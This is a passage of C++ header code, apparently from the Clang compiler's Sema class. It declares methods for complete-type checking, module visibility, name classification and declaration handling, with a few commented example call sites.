class SizelessTypeDiagnoser : public BoundTypeDiagnoser<Ts...> {
public:
SizelessTypeDiagnoser(unsigned DiagID, const Ts &... Args)
: BoundTypeDiagnoser<Ts...>(DiagID, Args...) {}
void diagnose(Sema &S, SourceLocation Loc, QualType T) override {
const SemaDiagnosticBuilder &DB = S.Diag(Loc, this->DiagID);
this->emit(DB, std::index_sequence_for<Ts...>());
DB << T->isSizelessType() << T;
}
};
enum class CompleteTypeKind {
/// Apply the normal rules for complete types. In particular,
/// treat all sizeless types as incomplete.
Normal,
/// Relax the normal rules for complete types so that they include
/// sizeless built-in types.
AcceptSizeless,
// FIXME: Eventually we should flip the default to Normal and opt in
// to AcceptSizeless rather than opt out of it.
Default = AcceptSizeless
};
private:
/// Methods for marking which expressions involve dereferencing a pointer
/// marked with the 'noderef' attribute. Expressions are checked bottom up
/// as they are parsed, so when a dereference is seen we cannot yet tell
/// whether the noderef pointer is actually accessed. For example, in `&*p`
/// where `p` is a noderef pointer, we first parse the `*p`, but must then
/// check that `address of` is applied to it. This requires keeping a
/// container of all pending expressions and checking whether their address
/// is eventually taken.
void CheckSubscriptAccessOfNoDeref(const ArraySubscriptExpr *E);
void CheckAddressOfNoDeref(const Expr *E);
void CheckMemberAccessOfNoDeref(const MemberExpr *E);
bool RequireCompleteTypeImpl(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, TypeDiagnoser *Diagnoser);
struct ModuleScope {
SourceLocation BeginLoc;
clang::Module *Module = nullptr;
bool ModuleInterface = false;
bool ImplicitGlobalModuleFragment = false;
VisibleModuleSet OuterVisibleModules;
};
/// The modules we're currently parsing.
llvm::SmallVector<ModuleScope, 16> ModuleScopes;
/// Namespace definitions that we will export when they finish.
llvm::SmallPtrSet<const NamespaceDecl*, 8> DeferredExportedNamespaces;
/// Get the module whose scope we are currently within.
Module *getCurrentModule() const {
return ModuleScopes.empty() ? nullptr : ModuleScopes.back().Module;
}
VisibleModuleSet VisibleModules;
public:
/// Get the module owning an entity.
Module *getOwningModule(const Decl *Entity) {
return Entity->getOwningModule();
}
/// Make a merged definition of an existing hidden definition \p ND
/// visible at the specified location.
void makeMergedDefinitionVisible(NamedDecl *ND);
bool isModuleVisible(const Module *M, bool ModulePrivate = false);
/// Determine whether a declaration is visible to name lookup.
bool isVisible(const NamedDecl *D) {
return !D->isHidden() || isVisibleSlow(D);
}
/// Determine whether any declaration of an entity is visible.
bool
hasVisibleDeclaration(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr) {
return isVisible(D) || hasVisibleDeclarationSlow(D, Modules);
}
bool hasVisibleDeclarationSlow(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules);
bool hasVisibleMergedDefinition(NamedDecl *Def);
bool hasMergedDefinitionInCurrentModule(NamedDecl *Def);
/// Determine if \p D and \p Suggested have a structurally compatible
/// layout as described in C11 6.2.7/1.
bool hasStructuralCompatLayout(Decl *D, Decl *Suggested);
/// Determine if \p D has a visible definition. If not, suggest a declaration
/// that should be made visible to expose the definition.
bool hasVisibleDefinition(NamedDecl *D, NamedDecl **Suggested,
bool OnlyNeedComplete = false);
bool hasVisibleDefinition(const NamedDecl *D) {
NamedDecl *Hidden;
return hasVisibleDefinition(const_cast<NamedDecl*>(D), &Hidden);
}
/// Determine if the template parameter \p D has a visible default argument.
bool
hasVisibleDefaultArgument(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is an explicit
/// specialization declaration for a specialization of a template. (For a
/// member specialization, use hasVisibleMemberSpecialization.)
bool hasVisibleExplicitSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is a member
/// specialization declaration (as opposed to an instantiated declaration).
bool hasVisibleMemberSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if \p A and \p B are equivalent internal linkage declarations
/// from different modules, and thus an ambiguity error can be downgraded to
/// an extension warning.
bool isEquivalentInternalLinkageDeclaration(const NamedDecl *A,
const NamedDecl *B);
void diagnoseEquivalentInternalLinkageDeclarations(
SourceLocation Loc, const NamedDecl *D,
ArrayRef<const NamedDecl *> Equiv);
bool isUsualDeallocationFunction(const CXXMethodDecl *FD);
bool isCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind = CompleteTypeKind::Default) {
return !RequireCompleteTypeImpl(Loc, T, Kind, nullptr);
}
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, TypeDiagnoser &Diagnoser);
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, unsigned DiagID);
bool RequireCompleteType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, Diagnoser);
}
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, DiagID);
}
template <typename... Ts>
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, Diagnoser);
}
template <typename... Ts>
bool RequireCompleteSizedType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, CompleteTypeKind::Normal, Diagnoser);
}
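// Illustrative sketch (diagnostic ID is hypothetical): require a complete
// type before computing its layout, bailing out if a diagnostic was
// emitted.
//
//   if (RequireCompleteType(Loc, T, diag::err_incomplete_type_used))
//     return ExprError();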
void completeExprArrayBound(Expr *E);
bool RequireCompleteExprType(Expr *E, CompleteTypeKind Kind,
TypeDiagnoser &Diagnoser);
bool RequireCompleteExprType(Expr *E, unsigned DiagID);
template <typename... Ts>
bool RequireCompleteExprType(Expr *E, unsigned DiagID, const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Default, Diagnoser);
}
template <typename... Ts>
bool RequireCompleteSizedExprType(Expr *E, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Normal, Diagnoser);
}
bool RequireLiteralType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID);
template <typename... Ts>
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireLiteralType(Loc, T, Diagnoser);
}
QualType getElaboratedType(ElaboratedTypeKeyword Keyword,
const CXXScopeSpec &SS, QualType T,
TagDecl *OwnedTagDecl = nullptr);
QualType BuildTypeofExprType(Expr *E, SourceLocation Loc);
/// If AsUnevaluated is false, E is treated as though it appeared in an
/// evaluated context, such as when building a type for decltype(auto).
QualType BuildDecltypeType(Expr *E, SourceLocation Loc,
bool AsUnevaluated = true);
QualType BuildUnaryTransformType(QualType BaseType,
UnaryTransformType::UTTKind UKind,
SourceLocation Loc);
//===--------------------------------------------------------------------===//
// Symbol table / Decl tracking callbacks: SemaDecl.cpp.
//
struct SkipBodyInfo {
SkipBodyInfo()
: ShouldSkip(false), CheckSameAsPrevious(false), Previous(nullptr),
New(nullptr) {}
bool ShouldSkip;
bool CheckSameAsPrevious;
NamedDecl *Previous;
NamedDecl *New;
};
DeclGroupPtrTy ConvertDeclToDeclGroup(Decl *Ptr, Decl *OwnedType = nullptr);
void DiagnoseUseOfUnimplementedSelectors();
bool isSimpleTypeSpecifier(tok::TokenKind Kind) const;
ParsedType getTypeName(const IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec *SS = nullptr,
bool isClassName = false, bool HasTrailingDot = false,
ParsedType ObjectType = nullptr,
bool IsCtorOrDtorName = false,
bool WantNontrivialTypeSourceInfo = false,
bool IsClassTemplateDeductionContext = true,
IdentifierInfo **CorrectedII = nullptr);
TypeSpecifierType isTagName(IdentifierInfo &II, Scope *S);
bool isMicrosoftMissingTypename(const CXXScopeSpec *SS, Scope *S);
void DiagnoseUnknownTypeName(IdentifierInfo *&II,
SourceLocation IILoc,
Scope *S,
CXXScopeSpec *SS,
ParsedType &SuggestedType,
bool IsTemplateName = false);
/// Attempt to behave like MSVC in situations where lookup of an unqualified
/// type name has failed in a dependent context. In these situations, we
/// automatically form a DependentTypeName that will retry lookup in a related
/// scope during instantiation.
ParsedType ActOnMSVCUnknownTypeName(const IdentifierInfo &II,
SourceLocation NameLoc,
bool IsTemplateTypeArg);
/// Describes the result of the name lookup and resolution performed
/// by \c ClassifyName().
enum NameClassificationKind {
/// This name is not a type or template in this context, but might be
/// something else.
NC_Unknown,
/// Classification failed; an error has been produced.
NC_Error,
/// The name has been typo-corrected to a keyword.
NC_Keyword,
/// The name was classified as a type.
NC_Type,
/// The name was classified as a specific non-type, non-template
/// declaration. ActOnNameClassifiedAsNonType should be called to
/// convert the declaration to an expression.
NC_NonType,
/// The name was classified as an ADL-only function name.
/// ActOnNameClassifiedAsUndeclaredNonType should be called to convert the
/// result to an expression.
NC_UndeclaredNonType,
/// The name denotes a member of a dependent type that could not be
/// resolved. ActOnNameClassifiedAsDependentNonType should be called to
/// convert the result to an expression.
NC_DependentNonType,
/// The name was classified as a non-type, and an expression representing
/// that name has been formed.
NC_ContextIndependentExpr,
/// The name was classified as a template whose specializations are types.
NC_TypeTemplate,
/// The name was classified as a variable template name.
NC_VarTemplate,
/// The name was classified as a function template name.
NC_FunctionTemplate,
/// The name was classified as an ADL-only function template name.
NC_UndeclaredTemplate,
/// The name was classified as a concept name.
NC_Concept,
};
class NameClassification {
NameClassificationKind Kind;
union {
ExprResult Expr;
NamedDecl *NonTypeDecl;
TemplateName Template;
ParsedType Type;
};
explicit NameClassification(NameClassificationKind Kind) : Kind(Kind) {}
public:
NameClassification(ParsedType Type) : Kind(NC_Type), Type(Type) {}
NameClassification(const IdentifierInfo *Keyword) : Kind(NC_Keyword) {}
static NameClassification Error() {
return NameClassification(NC_Error);
}
static NameClassification Unknown() {
return NameClassification(NC_Unknown);
}
static NameClassification ContextIndependentExpr(ExprResult E) {
NameClassification Result(NC_ContextIndependentExpr);
Result.Expr = E;
return Result;
}
static NameClassification NonType(NamedDecl *D) {
NameClassification Result(NC_NonType);
Result.NonTypeDecl = D;
return Result;
}
static NameClassification UndeclaredNonType() {
return NameClassification(NC_UndeclaredNonType);
}
static NameClassification DependentNonType() {
return NameClassification(NC_DependentNonType);
}
static NameClassification TypeTemplate(TemplateName Name) {
NameClassification Result(NC_TypeTemplate);
Result.Template = Name;
return Result;
}
static NameClassification VarTemplate(TemplateName Name) {
NameClassification Result(NC_VarTemplate);
Result.Template = Name;
return Result;
}
static NameClassification FunctionTemplate(TemplateName Name) {
NameClassification Result(NC_FunctionTemplate);
Result.Template = Name;
return Result;
}
static NameClassification Concept(TemplateName Name) {
NameClassification Result(NC_Concept);
Result.Template = Name;
return Result;
}
static NameClassification UndeclaredTemplate(TemplateName Name) {
NameClassification Result(NC_UndeclaredTemplate);
Result.Template = Name;
return Result;
}
NameClassificationKind getKind() const { return Kind; }
ExprResult getExpression() const {
assert(Kind == NC_ContextIndependentExpr);
return Expr;
}
ParsedType getType() const {
assert(Kind == NC_Type);
return Type;
}
NamedDecl *getNonTypeDecl() const {
assert(Kind == NC_NonType);
return NonTypeDecl;
}
TemplateName getTemplateName() const {
assert(Kind == NC_TypeTemplate || Kind == NC_FunctionTemplate ||
Kind == NC_VarTemplate || Kind == NC_Concept ||
Kind == NC_UndeclaredTemplate);
return Template;
}
TemplateNameKind getTemplateNameKind() const {
switch (Kind) {
case NC_TypeTemplate:
return TNK_Type_template;
case NC_FunctionTemplate:
return TNK_Function_template;
case NC_VarTemplate:
return TNK_Var_template;
case NC_Concept:
return TNK_Concept_template;
case NC_UndeclaredTemplate:
return TNK_Undeclared_template;
default:
llvm_unreachable("unsupported name classification.");
}
}
};
/// Perform name lookup on the given name, classifying it based on
/// the results of name lookup and the following token.
///
/// This routine is used by the parser to resolve identifiers and help direct
/// parsing. When the identifier cannot be found, this routine will attempt
/// to correct the typo and classify based on the resulting name.
///
/// \param S The scope in which we're performing name lookup.
///
/// \param SS The nested-name-specifier that precedes the name.
///
/// \param Name The identifier. If typo correction finds an alternative name,
/// this pointer parameter will be updated accordingly.
///
/// \param NameLoc The location of the identifier.
///
/// \param NextToken The token following the identifier. Used to help
/// disambiguate the name.
///
/// \param CCC The correction callback, if typo correction is desired.
NameClassification ClassifyName(Scope *S, CXXScopeSpec &SS,
IdentifierInfo *&Name, SourceLocation NameLoc,
const Token &NextToken,
CorrectionCandidateCallback *CCC = nullptr);
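// Illustrative sketch of consuming a classification (hypothetical call site;
// 'Actions' stands for the Sema instance and 'NextTok' for the lookahead
// token):
//   Sema::NameClassification C =
//       Actions.ClassifyName(S, SS, Name, NameLoc, NextTok);
//   switch (C.getKind()) {
//   case Sema::NC_Type: {
//     ParsedType T = C.getType();
//     // ... parse a declaration that starts with type T ...
//     break;
//   }
//   case Sema::NC_NonType: {
//     ExprResult E = Actions.ActOnNameClassifiedAsNonType(
//         S, SS, C.getNonTypeDecl(), NameLoc, NextTok);
//     break;
//   }
//   default:
//     break;
//   }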
/// Act on the result of classifying a name as an undeclared (ADL-only)
/// non-type declaration.
ExprResult ActOnNameClassifiedAsUndeclaredNonType(IdentifierInfo *Name,
SourceLocation NameLoc);
/// Act on the result of classifying a name as an undeclared member of a
/// dependent base class.
ExprResult ActOnNameClassifiedAsDependentNonType(const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsAddressOfOperand);
/// Act on the result of classifying a name as a specific non-type
/// declaration.
ExprResult ActOnNameClassifiedAsNonType(Scope *S, const CXXScopeSpec &SS,
NamedDecl *Found,
SourceLocation NameLoc,
const Token &NextToken);
/// Describes the detailed kind of a template name. Used in diagnostics.
enum class TemplateNameKindForDiagnostics {
ClassTemplate,
FunctionTemplate,
VarTemplate,
AliasTemplate,
TemplateTemplateParam,
Concept,
DependentTemplate
};
TemplateNameKindForDiagnostics
getTemplateNameKindForDiagnostics(TemplateName Name);
/// Determine whether it's plausible that E was intended to be a
/// template-name.
bool mightBeIntendedToBeTemplateName(ExprResult E, bool &Dependent) {
if (!getLangOpts().CPlusPlus || E.isInvalid())
return false;
Dependent = false;
if (auto *DRE = dyn_cast<DeclRefExpr>(E.get()))
return !DRE->hasExplicitTemplateArgs();
if (auto *ME = dyn_cast<MemberExpr>(E.get()))
return !ME->hasExplicitTemplateArgs();
Dependent = true;
if (auto *DSDRE = dyn_cast<DependentScopeDeclRefExpr>(E.get()))
return !DSDRE->hasExplicitTemplateArgs();
if (auto *DSME = dyn_cast<CXXDependentScopeMemberExpr>(E.get()))
return !DSME->hasExplicitTemplateArgs();
// Any additional cases recognized here should also be handled by
// diagnoseExprIntendedAsTemplateName.
return false;
}
void diagnoseExprIntendedAsTemplateName(Scope *S, ExprResult TemplateName,
SourceLocation Less,
SourceLocation Greater);
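// Illustrative sketch of the intended pairing (hypothetical call site):
//   bool Dependent = false;
//   if (mightBeIntendedToBeTemplateName(E, Dependent))
//     diagnoseExprIntendedAsTemplateName(S, E, LessLoc, GreaterLoc);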
Decl *ActOnDeclarator(Scope *S, Declarator &D);
NamedDecl *HandleDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParameterLists);
void RegisterLocallyScopedExternCDecl(NamedDecl *ND, Scope *S);
bool DiagnoseClassNameShadow(DeclContext *DC, DeclarationNameInfo Info);
bool diagnoseQualifiedDeclaration(CXXScopeSpec &SS, DeclContext *DC,
DeclarationName Name, SourceLocation Loc,
bool IsTemplateId);
void
diagnoseIgnoredQualifiers(unsigned DiagID, unsigned Quals,
SourceLocation FallbackLoc,
SourceLocation ConstQualLoc = SourceLocation(),
SourceLocation VolatileQualLoc = SourceLocation(),
SourceLocation RestrictQualLoc = SourceLocation(),
SourceLocation AtomicQualLoc = SourceLocation(),
SourceLocation UnalignedQualLoc = SourceLocation());
void diagnosePointerAuthDisabled(SourceLocation loc, SourceRange range);
bool checkConstantPointerAuthKey(Expr *keyExpr, unsigned &key);
static bool adjustContextForLocalExternDecl(DeclContext *&DC);
void DiagnoseFunctionSpecifiers(const DeclSpec &DS);
NamedDecl *getShadowedDeclaration(const TypedefNameDecl *D,
const LookupResult &R);
NamedDecl *getShadowedDeclaration(const VarDecl *D, const LookupResult &R);
void CheckShadow(NamedDecl *D, NamedDecl *ShadowedDecl,
const LookupResult &R);
void CheckShadow(Scope *S, VarDecl *D);
/// Warn if 'E', which is an expression that is about to be modified, refers
/// to a shadowing declaration.
void CheckShadowingDeclModification(Expr *E, SourceLocation Loc);
void DiagnoseShadowingLambdaDecls(const sema::LambdaScopeInfo *LSI);
private:
/// Map of current shadowing declarations to shadowed declarations. Warn if
/// it looks like the user is trying to modify the shadowing declaration.
llvm::DenseMap<const NamedDecl *, const NamedDecl *> ShadowingDecls;
public:
void CheckCastAlign(Expr *Op, QualType T, SourceRange TRange);
void handleTagNumbering(const TagDecl *Tag, Scope *TagScope);
void setTagNameForLinkagePurposes(TagDecl *TagFromDeclSpec,
TypedefNameDecl *NewTD);
void CheckTypedefForVariablyModifiedType(Scope *S, TypedefNameDecl *D);
NamedDecl* ActOnTypedefDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous);
NamedDecl* ActOnTypedefNameDecl(Scope* S, DeclContext* DC, TypedefNameDecl *D,
LookupResult &Previous, bool &Redeclaration);
NamedDecl *ActOnVariableDeclarator(Scope *S, Declarator &D, DeclContext *DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope,
ArrayRef<BindingDecl *> Bindings = None);
NamedDecl *
ActOnDecompositionDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists);
// Returns true if the variable declaration is a redeclaration
bool CheckVariableDeclaration(VarDecl *NewVD, LookupResult &Previous);
void CheckVariableDeclarationType(VarDecl *NewVD);
bool DeduceVariableDeclarationType(VarDecl *VDecl, bool DirectInit,
Expr *Init);
void CheckCompleteVariableDeclaration(VarDecl *VD);
void CheckCompleteDecompositionDeclaration(DecompositionDecl *DD);
void MaybeSuggestAddingStaticToDecl(const FunctionDecl *D);
NamedDecl* ActOnFunctionDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope);
bool AddOverriddenMethods(CXXRecordDecl *DC, CXXMethodDecl *MD);
enum class CheckConstexprKind {
/// Diagnose issues that are non-constant or that are extensions.
Diagnose,
/// Identify whether this function satisfies the formal rules for constexpr
/// functions in the current language mode (with no extensions).
CheckValid
};
bool CheckConstexprFunctionDefinition(const FunctionDecl *FD,
CheckConstexprKind Kind);
void DiagnoseHiddenVirtualMethods(CXXMethodDecl *MD);
void FindHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
void NoteHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
// Returns true if the function declaration is a redeclaration
bool CheckFunctionDeclaration(Scope *S,
FunctionDecl *NewFD, LookupResult &Previous,
bool IsMemberSpecialization);
bool shouldLinkDependentDeclWithPrevious(Decl *D, Decl *OldDecl);
bool canFullyTypeCheckRedeclaration(ValueDecl *NewD, ValueDecl *OldD,
QualType NewT, QualType OldT);
void CheckMain(FunctionDecl *FD, const DeclSpec &D);
void CheckMSVCRTEntryPoint(FunctionDecl *FD);
Attr *getImplicitCodeSegOrSectionAttrForFunction(const FunctionDecl *FD,
bool IsDefinition);
void CheckFunctionOrTemplateParamDeclarator(Scope *S, Declarator &D);
Decl *ActOnParamDeclarator(Scope *S, Declarator &D);
ParmVarDecl *BuildParmVarDeclForTypedef(DeclContext *DC,
SourceLocation Loc,
QualType T);
QualType adjustParameterTypeForObjCAutoRefCount(QualType T,
SourceLocation NameLoc,
TypeSourceInfo *TSInfo);
ParmVarDecl *CheckParameter(DeclContext *DC, SourceLocation StartLoc,
SourceLocation NameLoc, IdentifierInfo *Name,
QualType T, TypeSourceInfo *TSInfo,
StorageClass SC);
void ActOnParamDefaultArgument(Decl *param,
SourceLocation EqualLoc,
Expr *defarg);
void ActOnParamUnparsedDefaultArgument(Decl *param,
SourceLocation EqualLoc,
SourceLocation ArgLoc);
void ActOnParamDefaultArgumentError(Decl *param, SourceLocation EqualLoc);
bool SetParamDefaultArgument(ParmVarDecl *Param, Expr *DefaultArg,
SourceLocation EqualLoc);
// Contexts where using non-trivial C union types can be disallowed. This is
// passed to err_non_trivial_c_union_in_invalid_context.
enum NonTrivialCUnionContext {
// Function parameter.
NTCUC_FunctionParam,
// Function return.
NTCUC_FunctionReturn,
// Default-initialized object.
NTCUC_DefaultInitializedObject,
// Variable with automatic storage duration.
NTCUC_AutoVar,
// Initializer expression that might copy from another object.
NTCUC_CopyInit,
// Assignment.
NTCUC_Assignment,
// Compound literal.
NTCUC_CompoundLiteral,
// Block capture.
NTCUC_BlockCapture,
// lvalue-to-rvalue conversion of volatile type.
NTCUC_LValueToRValueVolatile,
};
/// Emit diagnostics if the initializer or any of its explicit or
/// implicitly-generated subexpressions require copying or
/// default-initializing a type that is or contains a C union type that is
/// non-trivial to copy or default-initialize.
void checkNonTrivialCUnionInInitializer(const Expr *Init, SourceLocation Loc);
// These flags are passed to checkNonTrivialCUnion.
enum NonTrivialCUnionKind {
NTCUK_Init = 0x1,
NTCUK_Destruct = 0x2,
NTCUK_Copy = 0x4,
};
/// Emit diagnostics if a non-trivial C union type or a struct that contains
/// a non-trivial C union is used in an invalid context.
void checkNonTrivialCUnion(QualType QT, SourceLocation Loc,
NonTrivialCUnionContext UseContext,
unsigned NonTrivialKind);
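// Illustrative sketch (hypothetical call site): the NTCUK_* flags may be
// OR'd together when several checks apply to the same use.
//   checkNonTrivialCUnion(VD->getType(), VD->getLocation(),
//                         NTCUC_DefaultInitializedObject,
//                         NTCUK_Init | NTCUK_Destruct);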
void AddInitializerToDecl(Decl *dcl, Expr *init, bool DirectInit);
void ActOnUninitializedDecl(Decl *dcl);
void ActOnInitializerError(Decl *Dcl);
void ActOnPureSpecifier(Decl *D, SourceLocation PureSpecLoc);
void ActOnCXXForRangeDecl(Decl *D);
StmtResult ActOnCXXForRangeIdentifier(Scope *S, SourceLocation IdentLoc,
IdentifierInfo *Ident,
ParsedAttributes &Attrs,
SourceLocation AttrEnd);
void SetDeclDeleted(Decl *dcl, SourceLocation DelLoc);
void SetDeclDefaulted(Decl *dcl, SourceLocation DefaultLoc);
void CheckStaticLocalForDllExport(VarDecl *VD);
void FinalizeDeclaration(Decl *D);
DeclGroupPtrTy FinalizeDeclaratorGroup(Scope *S, const DeclSpec &DS,
ArrayRef<Decl *> Group);
DeclGroupPtrTy BuildDeclaratorGroup(MutableArrayRef<Decl *> Group);
/// Should be called on all declarations that might have attached
/// documentation comments.
void ActOnDocumentableDecl(Decl *D);
void ActOnDocumentableDecls(ArrayRef<Decl *> Group);
void ActOnFinishKNRParamDeclarations(Scope *S, Declarator &D,
SourceLocation LocAfterDecls);
void CheckForFunctionRedefinition(
FunctionDecl *FD, const FunctionDecl *EffectiveDefinition = nullptr,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Decl *D,
SkipBodyInfo *SkipBody = nullptr);
void ActOnStartTrailingRequiresClause(Scope *S, Declarator &D);
ExprResult ActOnFinishTrailingRequiresClause(ExprResult ConstraintExpr);
void ActOnStartOfObjCMethodDef(Scope *S, Decl *D);
bool isObjCMethodDecl(Decl *D) {
return D && isa<ObjCMethodDecl>(D);
}
/// Determine whether we can delay parsing the body of a function or
/// function template until it is used, assuming we don't care about emitting
/// code for that function.
///
/// This will be \c false if we may need the body of the function in the
/// middle of parsing an expression (where it's impractical to switch to
/// parsing a different function), for instance, if it's constexpr in C++11
/// or has an 'auto' return type in C++14. These cases are essentially bugs.
bool canDelayFunctionBody(const Declarator &D);
/// Determine whether we can skip parsing the body of a function
/// definition, assuming we don't care about analyzing its body or emitting
/// code for that function.
///
/// This will be \c false only if we may need the body of the function in
/// order to parse the rest of the program (for instance, if it is
/// \c constexpr in C++11 or has an 'auto' return type in C++14).
bool canSkipFunctionBody(Decl *D);
void computeNRVO(Stmt *Body, sema::FunctionScopeInfo *Scope);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body, bool IsInstantiation);
Decl *ActOnSkippedFunctionBody(Decl *Decl);
void ActOnFinishInlineFunctionDef(FunctionDecl *D);
/// ActOnFinishDelayedAttribute - Invoked when we have finished parsing an
/// attribute for which parsing is delayed.
void ActOnFinishDelayedAttribute(Scope *S, Decl *D, ParsedAttributes &Attrs);
/// Diagnose any unused parameters in the given sequence of
/// ParmVarDecl pointers.
void DiagnoseUnusedParameters(ArrayRef<ParmVarDecl *> Parameters);
/// Diagnose whether the size of parameters or return value of a
/// function or obj-c method definition is pass-by-value and larger than a
/// specified threshold.
void
DiagnoseSizeOfParametersAndReturnValue(ArrayRef<ParmVarDecl *> Parameters,
QualType ReturnTy, NamedDecl *D);
void DiagnoseInvalidJumps(Stmt *Body);
Decl *ActOnFileScopeAsmDecl(Expr *expr,
SourceLocation AsmLoc,
SourceLocation RParenLoc);
/// Handle a C++11 empty-declaration and attribute-declaration.
Decl *ActOnEmptyDeclaration(Scope *S, const ParsedAttributesView &AttrList,
SourceLocation SemiLoc);
enum class ModuleDeclKind {
Interface, ///< 'export module X;'
Implementation, ///< 'module X;'
};
/// The parser has processed a module-declaration that begins the definition
/// of a module interface or implementation.
DeclGroupPtrTy ActOnModuleDecl(SourceLocation StartLoc,
SourceLocation ModuleLoc, ModuleDeclKind MDK,
ModuleIdPath Path, bool IsFirstDecl);
/// The parser has processed a global-module-fragment declaration that begins
/// the definition of the global module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
DeclGroupPtrTy ActOnGlobalModuleFragmentDecl(SourceLocation ModuleLoc);
/// The parser has processed a private-module-fragment declaration that begins
/// the definition of the private module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
/// \param PrivateLoc The location of the 'private' keyword.
DeclGroupPtrTy ActOnPrivateModuleFragmentDecl(SourceLocation ModuleLoc,
SourceLocation PrivateLoc);
/// The parser has processed a module import declaration.
///
/// \param StartLoc The location of the first token in the declaration. This
/// could be the location of an '@', 'export', or 'import'.
/// \param ExportLoc The location of the 'export' keyword, if any.
/// \param ImportLoc The location of the 'import' keyword.
/// \param Path The module access path.
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, ModuleIdPath Path);
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, Module *M,
ModuleIdPath Path = {});
/// The parser has processed a module import translated from a
/// #include or similar preprocessing directive.
void ActOnModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
void BuildModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has entered a submodule.
void ActOnModuleBegin(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has left a submodule.
void ActOnModuleEnd(SourceLocation DirectiveLoc, Module *Mod);
/// Create an implicit import of the given module at the given
/// source location, for error recovery, if possible.
///
/// This routine is typically used when an entity found by name lookup
/// is actually hidden within a module that we know about but the user
/// has forgotten to import.
void createImplicitModuleImportForErrorRecovery(SourceLocation Loc,
Module *Mod);
/// Kinds of missing import. Note, the values of these enumerators correspond
/// to %select values in diagnostics.
enum class MissingImportKind {
Declaration,
Definition,
DefaultArgument,
ExplicitSpecialization,
PartialSpecialization
};
/// Diagnose that the specified declaration needs to be visible but
/// isn't, and suggest a module import that would resolve the problem.
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
MissingImportKind MIK, bool Recover = true);
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
SourceLocation DeclLoc, ArrayRef<Module *> Modules,
MissingImportKind MIK, bool Recover);
Decl *ActOnStartExportDecl(Scope *S, SourceLocation ExportLoc,
SourceLocation LBraceLoc);
Decl *ActOnFinishExportDecl(Scope *S, Decl *ExportDecl,
SourceLocation RBraceLoc);
/// We've found a use of a templated declaration that would trigger an
/// implicit instantiation. Check that any relevant explicit specializations
/// and partial specializations are visible, and diagnose if not.
void checkSpecializationVisibility(SourceLocation Loc, NamedDecl *Spec);
/// We've found a use of a template specialization that would select a
/// partial specialization. Check that the partial specialization is visible,
/// and diagnose if not.
void checkPartialSpecializationVisibility(SourceLocation Loc,
NamedDecl *Spec);
/// Retrieve a suitable printing policy for diagnostics.
PrintingPolicy getPrintingPolicy() const {
return getPrintingPolicy(Context, PP);
}
/// Retrieve a suitable printing policy for diagnostics.
static PrintingPolicy getPrintingPolicy(const ASTContext &Ctx,
const Preprocessor &PP);
/// Scope actions.
void ActOnPopScope(SourceLocation Loc, Scope *S);
void ActOnTranslationUnitScope(Scope *S);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
